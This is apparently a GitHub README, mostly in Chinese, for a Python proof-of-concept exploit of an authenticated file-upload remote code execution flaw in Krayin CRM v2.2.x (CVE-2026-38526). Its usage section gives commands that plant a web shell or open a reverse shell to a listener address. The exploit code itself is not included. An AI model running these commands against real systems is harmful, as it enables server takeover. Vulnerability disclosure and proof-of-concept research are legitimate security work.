Qurclinc/CVE-2026-38526
GitHub: Qurclinc/CVE-2026-38526
Krayin CRM v2.2.x 认证后远程代码执行漏洞(CVE-2026-38526)的 Python PoC 利用脚本。
Stars: 0 | Forks: 0
# CVE-2026-38526 - Krayin CRM RCE
## 描述
用于 Krayin CRM v2.2.x 中严重漏洞的 PoC 脚本,允许通过不受限制的文件上传进行经过身份验证的 RCE。
## 用法
```
# Web shell
python3 exploit.py -u http://target.com -e admin@example.com -p password123
# Reverse shell
python3 exploit.py -u http://target.com -e admin@example.com -p password123 -l 10.10.10.10 -P 4444
```
## 环境要求
- Python 3.8+
- requests, bs4
## 免责声明
仅供教育目的使用。
## 参考
- https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2026-38526/poc.md
标签:Python, RCE, Web安全, 安全, 无后门, 蓝队分析, 超时处理, 逆向工具